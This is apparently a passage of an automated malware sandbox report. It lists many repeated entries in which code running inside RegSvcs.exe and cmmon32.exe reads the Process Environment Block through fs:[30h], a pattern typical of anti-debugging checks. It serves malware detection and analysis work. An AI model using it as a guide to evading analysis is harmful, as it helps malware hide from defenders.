Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_019F3D34 mov eax, dword ptr fs:[00000030h]	1_2_019F3D34
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_019F3D34 mov eax, dword ptr fs:[00000030h]	1_2_019F3D34
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_019F3D34 mov eax, dword ptr fs:[00000030h]	1_2_019F3D34
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_019F3D34 mov eax, dword ptr fs:[00000030h]	1_2_019F3D34
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_019F3D34 mov eax, dword ptr fs:[00000030h]	1_2_019F3D34
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_019EAD30 mov eax, dword ptr fs:[00000030h]	1_2_019EAD30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_01A0C577 mov eax, dword ptr fs:[00000030h]	1_2_01A0C577
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_01A0C577 mov eax, dword ptr fs:[00000030h]	1_2_01A0C577
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_01A23D43 mov eax, dword ptr fs:[00000030h]	1_2_01A23D43
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_01A63540 mov eax, dword ptr fs:[00000030h]	1_2_01A63540
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_01A07D50 mov eax, dword ptr fs:[00000030h]	1_2_01A07D50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_019F849B mov eax, dword ptr fs:[00000030h]	1_2_019F849B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_01AA14FB mov eax, dword ptr fs:[00000030h]	1_2_01AA14FB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_01A66CF0 mov eax, dword ptr fs:[00000030h]	1_2_01A66CF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_01A66CF0 mov eax, dword ptr fs:[00000030h]	1_2_01A66CF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_01A66CF0 mov eax, dword ptr fs:[00000030h]	1_2_01A66CF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_01AB8CD6 mov eax, dword ptr fs:[00000030h]	1_2_01AB8CD6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_01A1BC2C mov eax, dword ptr fs:[00000030h]	1_2_01A1BC2C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_01AB740D mov eax, dword ptr fs:[00000030h]	1_2_01AB740D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_01AB740D mov eax, dword ptr fs:[00000030h]	1_2_01AB740D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_01AB740D mov eax, dword ptr fs:[00000030h]	1_2_01AB740D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_01AA1C06 mov eax, dword ptr fs:[00000030h]	1_2_01AA1C06
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_01AA1C06 mov eax, dword ptr fs:[00000030h]	1_2_01AA1C06
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_01AA1C06 mov eax, dword ptr fs:[00000030h]	1_2_01AA1C06
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_01AA1C06 mov eax, dword ptr fs:[00000030h]	1_2_01AA1C06
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_01AA1C06 mov eax, dword ptr fs:[00000030h]	1_2_01AA1C06
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_01AA1C06 mov eax, dword ptr fs:[00000030h]	1_2_01AA1C06
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_01AA1C06 mov eax, dword ptr fs:[00000030h]	1_2_01AA1C06
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_01AA1C06 mov eax, dword ptr fs:[00000030h]	1_2_01AA1C06
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_01AA1C06 mov eax, dword ptr fs:[00000030h]	1_2_01AA1C06
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_01AA1C06 mov eax, dword ptr fs:[00000030h]	1_2_01AA1C06
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_01AA1C06 mov eax, dword ptr fs:[00000030h]	1_2_01AA1C06
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_01AA1C06 mov eax, dword ptr fs:[00000030h]	1_2_01AA1C06
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_01AA1C06 mov eax, dword ptr fs:[00000030h]	1_2_01AA1C06
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_01AA1C06 mov eax, dword ptr fs:[00000030h]	1_2_01AA1C06
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_01A66C0A mov eax, dword ptr fs:[00000030h]	1_2_01A66C0A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_01A66C0A mov eax, dword ptr fs:[00000030h]	1_2_01A66C0A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_01A66C0A mov eax, dword ptr fs:[00000030h]	1_2_01A66C0A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_01A66C0A mov eax, dword ptr fs:[00000030h]	1_2_01A66C0A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_01A0746D mov eax, dword ptr fs:[00000030h]	1_2_01A0746D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_01A1A44B mov eax, dword ptr fs:[00000030h]	1_2_01A1A44B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_01A7C450 mov eax, dword ptr fs:[00000030h]	1_2_01A7C450
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_01A7C450 mov eax, dword ptr fs:[00000030h]	1_2_01A7C450
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_019F8794 mov eax, dword ptr fs:[00000030h]	1_2_019F8794
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_01A67794 mov eax, dword ptr fs:[00000030h]	1_2_01A67794
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_01A67794 mov eax, dword ptr fs:[00000030h]	1_2_01A67794
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_01A67794 mov eax, dword ptr fs:[00000030h]	1_2_01A67794
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_01A237F5 mov eax, dword ptr fs:[00000030h]	1_2_01A237F5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_01A1E730 mov eax, dword ptr fs:[00000030h]	1_2_01A1E730
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_01AB070D mov eax, dword ptr fs:[00000030h]	1_2_01AB070D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_01AB070D mov eax, dword ptr fs:[00000030h]	1_2_01AB070D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_01A1A70E mov eax, dword ptr fs:[00000030h]	1_2_01A1A70E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_01A1A70E mov eax, dword ptr fs:[00000030h]	1_2_01A1A70E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_019E4F2E mov eax, dword ptr fs:[00000030h]	1_2_019E4F2E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_019E4F2E mov eax, dword ptr fs:[00000030h]	1_2_019E4F2E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_01A0F716 mov eax, dword ptr fs:[00000030h]	1_2_01A0F716
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_01A7FF10 mov eax, dword ptr fs:[00000030h]	1_2_01A7FF10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_01A7FF10 mov eax, dword ptr fs:[00000030h]	1_2_01A7FF10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_01AB8F6A mov eax, dword ptr fs:[00000030h]	1_2_01AB8F6A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_019FEF40 mov eax, dword ptr fs:[00000030h]	1_2_019FEF40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_019FFF60 mov eax, dword ptr fs:[00000030h]	1_2_019FFF60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_01A646A7 mov eax, dword ptr fs:[00000030h]	1_2_01A646A7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_01AB0EA5 mov eax, dword ptr fs:[00000030h]	1_2_01AB0EA5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_01AB0EA5 mov eax, dword ptr fs:[00000030h]	1_2_01AB0EA5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_01AB0EA5 mov eax, dword ptr fs:[00000030h]	1_2_01AB0EA5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_01A7FE87 mov eax, dword ptr fs:[00000030h]	1_2_01A7FE87
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_01A116E0 mov ecx, dword ptr fs:[00000030h]	1_2_01A116E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_01A28EC7 mov eax, dword ptr fs:[00000030h]	1_2_01A28EC7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_01A9FEC0 mov eax, dword ptr fs:[00000030h]	1_2_01A9FEC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_01A136CC mov eax, dword ptr fs:[00000030h]	1_2_01A136CC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_01AB8ED6 mov eax, dword ptr fs:[00000030h]	1_2_01AB8ED6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_019F76E2 mov eax, dword ptr fs:[00000030h]	1_2_019F76E2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_01A9FE3F mov eax, dword ptr fs:[00000030h]	1_2_01A9FE3F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_019EC600 mov eax, dword ptr fs:[00000030h]	1_2_019EC600
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_019EC600 mov eax, dword ptr fs:[00000030h]	1_2_019EC600
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_019EC600 mov eax, dword ptr fs:[00000030h]	1_2_019EC600
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_01A18E00 mov eax, dword ptr fs:[00000030h]	1_2_01A18E00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_01A1A61C mov eax, dword ptr fs:[00000030h]	1_2_01A1A61C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_01A1A61C mov eax, dword ptr fs:[00000030h]	1_2_01A1A61C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_019EE620 mov eax, dword ptr fs:[00000030h]	1_2_019EE620
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_01A0AE73 mov eax, dword ptr fs:[00000030h]	1_2_01A0AE73
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_01A0AE73 mov eax, dword ptr fs:[00000030h]	1_2_01A0AE73
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_01A0AE73 mov eax, dword ptr fs:[00000030h]	1_2_01A0AE73
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_01A0AE73 mov eax, dword ptr fs:[00000030h]	1_2_01A0AE73
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_01A0AE73 mov eax, dword ptr fs:[00000030h]	1_2_01A0AE73
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_019F7E41 mov eax, dword ptr fs:[00000030h]	1_2_019F7E41
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_019F7E41 mov eax, dword ptr fs:[00000030h]	1_2_019F7E41
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_019F7E41 mov eax, dword ptr fs:[00000030h]	1_2_019F7E41
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_019F7E41 mov eax, dword ptr fs:[00000030h]	1_2_019F7E41
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_019F7E41 mov eax, dword ptr fs:[00000030h]	1_2_019F7E41
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_019F7E41 mov eax, dword ptr fs:[00000030h]	1_2_019F7E41
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_019F766D mov eax, dword ptr fs:[00000030h]	1_2_019F766D
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 5_2_049E849B mov eax, dword ptr fs:[00000030h]	5_2_049E849B
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 5_2_04A190AF mov eax, dword ptr fs:[00000030h]	5_2_04A190AF
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 5_2_049D9080 mov eax, dword ptr fs:[00000030h]	5_2_049D9080
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 5_2_04A0F0BF mov ecx, dword ptr fs:[00000030h]	5_2_04A0F0BF
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 5_2_04A0F0BF mov eax, dword ptr fs:[00000030h]	5_2_04A0F0BF
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 5_2_04A0F0BF mov eax, dword ptr fs:[00000030h]	5_2_04A0F0BF
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 5_2_04A53884 mov eax, dword ptr fs:[00000030h]	5_2_04A53884
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 5_2_04A53884 mov eax, dword ptr fs:[00000030h]	5_2_04A53884
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 5_2_04A914FB mov eax, dword ptr fs:[00000030h]	5_2_04A914FB
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 5_2_04A56CF0 mov eax, dword ptr fs:[00000030h]	5_2_04A56CF0
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 5_2_04A56CF0 mov eax, dword ptr fs:[00000030h]	5_2_04A56CF0
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 5_2_04A56CF0 mov eax, dword ptr fs:[00000030h]	5_2_04A56CF0
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 5_2_04A6B8D0 mov eax, dword ptr fs:[00000030h]	5_2_04A6B8D0
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 5_2_04A6B8D0 mov ecx, dword ptr fs:[00000030h]	5_2_04A6B8D0
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 5_2_04A6B8D0 mov eax, dword ptr fs:[00000030h]	5_2_04A6B8D0
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 5_2_04A6B8D0 mov eax, dword ptr fs:[00000030h]	5_2_04A6B8D0
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 5_2_04A6B8D0 mov eax, dword ptr fs:[00000030h]	5_2_04A6B8D0
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 5_2_04A6B8D0 mov eax, dword ptr fs:[00000030h]	5_2_04A6B8D0
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 5_2_04AA8CD6 mov eax, dword ptr fs:[00000030h]	5_2_04AA8CD6
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 5_2_04A0BC2C mov eax, dword ptr fs:[00000030h]	5_2_04A0BC2C
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 5_2_04A0002D mov eax, dword ptr fs:[00000030h]	5_2_04A0002D
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 5_2_04A0002D mov eax, dword ptr fs:[00000030h]	5_2_04A0002D
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 5_2_04A0002D mov eax, dword ptr fs:[00000030h]	5_2_04A0002D
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 5_2_04A0002D mov eax, dword ptr fs:[00000030h]	5_2_04A0002D
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 5_2_04A0002D mov eax, dword ptr fs:[00000030h]	5_2_04A0002D
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 5_2_04AA740D mov eax, dword ptr fs:[00000030h]	5_2_04AA740D
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 5_2_04AA740D mov eax, dword ptr fs:[00000030h]	5_2_04AA740D
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 5_2_04AA740D mov eax, dword ptr fs:[00000030h]	5_2_04AA740D
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 5_2_04A91C06 mov eax, dword ptr fs:[00000030h]	5_2_04A91C06
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 5_2_04A91C06 mov eax, dword ptr fs:[00000030h]	5_2_04A91C06
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 5_2_04A91C06 mov eax, dword ptr fs:[00000030h]	5_2_04A91C06
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 5_2_04A91C06 mov eax, dword ptr fs:[00000030h]	5_2_04A91C06
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 5_2_04A91C06 mov eax, dword ptr fs:[00000030h]	5_2_04A91C06
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 5_2_04A91C06 mov eax, dword ptr fs:[00000030h]	5_2_04A91C06
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 5_2_04A91C06 mov eax, dword ptr fs:[00000030h]	5_2_04A91C06
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 5_2_04A91C06 mov eax, dword ptr fs:[00000030h]	5_2_04A91C06
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 5_2_04A91C06 mov eax, dword ptr fs:[00000030h]	5_2_04A91C06
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 5_2_04A91C06 mov eax, dword ptr fs:[00000030h]	5_2_04A91C06
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 5_2_04A91C06 mov eax, dword ptr fs:[00000030h]	5_2_04A91C06
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 5_2_04A91C06 mov eax, dword ptr fs:[00000030h]	5_2_04A91C06
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 5_2_04A91C06 mov eax, dword ptr fs:[00000030h]	5_2_04A91C06
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 5_2_04A91C06 mov eax, dword ptr fs:[00000030h]	5_2_04A91C06
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 5_2_04A56C0A mov eax, dword ptr fs:[00000030h]	5_2_04A56C0A
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 5_2_04A56C0A mov eax, dword ptr fs:[00000030h]	5_2_04A56C0A
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 5_2_04A56C0A mov eax, dword ptr fs:[00000030h]	5_2_04A56C0A
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 5_2_04A56C0A mov eax, dword ptr fs:[00000030h]	5_2_04A56C0A
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 5_2_04A57016 mov eax, dword ptr fs:[00000030h]	5_2_04A57016
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 5_2_04A57016 mov eax, dword ptr fs:[00000030h]	5_2_04A57016
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 5_2_04A57016 mov eax, dword ptr fs:[00000030h]	5_2_04A57016
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 5_2_049EB02A mov eax, dword ptr fs:[00000030h]	5_2_049EB02A
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 5_2_049EB02A mov eax, dword ptr fs:[00000030h]	5_2_049EB02A
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 5_2_049EB02A mov eax, dword ptr fs:[00000030h]	5_2_049EB02A
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 5_2_049EB02A mov eax, dword ptr fs:[00000030h]	5_2_049EB02A
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 5_2_04AA4015 mov eax, dword ptr fs:[00000030h]	5_2_04AA4015
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 5_2_04AA4015 mov eax, dword ptr fs:[00000030h]	5_2_04AA4015
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 5_2_049F0050 mov eax, dword ptr fs:[00000030h]	5_2_049F0050
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 5_2_049F0050 mov eax, dword ptr fs:[00000030h]	5_2_049F0050
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 5_2_04A92073 mov eax, dword ptr fs:[00000030h]	5_2_04A92073
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 5_2_04AA1074 mov eax, dword ptr fs:[00000030h]	5_2_04AA1074
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 5_2_04A0A44B mov eax, dword ptr fs:[00000030h]	5_2_04A0A44B
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 5_2_049F746D mov eax, dword ptr fs:[00000030h]	5_2_049F746D
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 5_2_04A6C450 mov eax, dword ptr fs:[00000030h]	5_2_04A6C450
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 5_2_04A6C450 mov eax, dword ptr fs:[00000030h]	5_2_04A6C450
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 5_2_04A061A0 mov eax, dword ptr fs:[00000030h]	5_2_04A061A0
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 5_2_04A061A0 mov eax, dword ptr fs:[00000030h]	5_2_04A061A0
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 5_2_04A035A1 mov eax, dword ptr fs:[00000030h]	5_2_04A035A1
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 5_2_04A569A6 mov eax, dword ptr fs:[00000030h]	5_2_04A569A6
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 5_2_04A01DB5 mov eax, dword ptr fs:[00000030h]	5_2_04A01DB5
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 5_2_04A01DB5 mov eax, dword ptr fs:[00000030h]	5_2_04A01DB5
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 5_2_04A01DB5 mov eax, dword ptr fs:[00000030h]	5_2_04A01DB5
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 5_2_049D2D8A mov eax, dword ptr fs:[00000030h]	5_2_049D2D8A
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 5_2_049D2D8A mov eax, dword ptr fs:[00000030h]	5_2_049D2D8A
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 5_2_049D2D8A mov eax, dword ptr fs:[00000030h]	5_2_049D2D8A
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 5_2_049D2D8A mov eax, dword ptr fs:[00000030h]	5_2_049D2D8A
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 5_2_049D2D8A mov eax, dword ptr fs:[00000030h]	5_2_049D2D8A
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 5_2_04A551BE mov eax, dword ptr fs:[00000030h]	5_2_04A551BE
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 5_2_04A551BE mov eax, dword ptr fs:[00000030h]	5_2_04A551BE
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 5_2_04A551BE mov eax, dword ptr fs:[00000030h]	5_2_04A551BE
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 5_2_04A551BE mov eax, dword ptr fs:[00000030h]	5_2_04A551BE
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 5_2_049FC182 mov eax, dword ptr fs:[00000030h]	5_2_049FC182
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 5_2_04A02581 mov eax, dword ptr fs:[00000030h]	5_2_04A02581
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 5_2_04A02581 mov eax, dword ptr fs:[00000030h]	5_2_04A02581
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 5_2_04A02581 mov eax, dword ptr fs:[00000030h]	5_2_04A02581
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 5_2_04A02581 mov eax, dword ptr fs:[00000030h]	5_2_04A02581
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 5_2_04A0A185 mov eax, dword ptr fs:[00000030h]	5_2_04A0A185
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 5_2_04A02990 mov eax, dword ptr fs:[00000030h]	5_2_04A02990
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 5_2_04A0FD9B mov eax, dword ptr fs:[00000030h]	5_2_04A0FD9B
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 5_2_04A0FD9B mov eax, dword ptr fs:[00000030h]	5_2_04A0FD9B
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 5_2_04A641E8 mov eax, dword ptr fs:[00000030h]	5_2_04A641E8
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 5_2_04A88DF1 mov eax, dword ptr fs:[00000030h]	5_2_04A88DF1
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 5_2_049DB1E1 mov eax, dword ptr fs:[00000030h]	5_2_049DB1E1
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 5_2_049DB1E1 mov eax, dword ptr fs:[00000030h]	5_2_049DB1E1
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 5_2_049DB1E1 mov eax, dword ptr fs:[00000030h]	5_2_049DB1E1
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 5_2_049ED5E0 mov eax, dword ptr fs:[00000030h]	5_2_049ED5E0
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 5_2_049ED5E0 mov eax, dword ptr fs:[00000030h]	5_2_049ED5E0
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 5_2_04A5A537 mov eax, dword ptr fs:[00000030h]	5_2_04A5A537
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 5_2_04A0513A mov eax, dword ptr fs:[00000030h]	5_2_04A0513A
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 5_2_04A0513A mov eax, dword ptr fs:[00000030h]	5_2_04A0513A
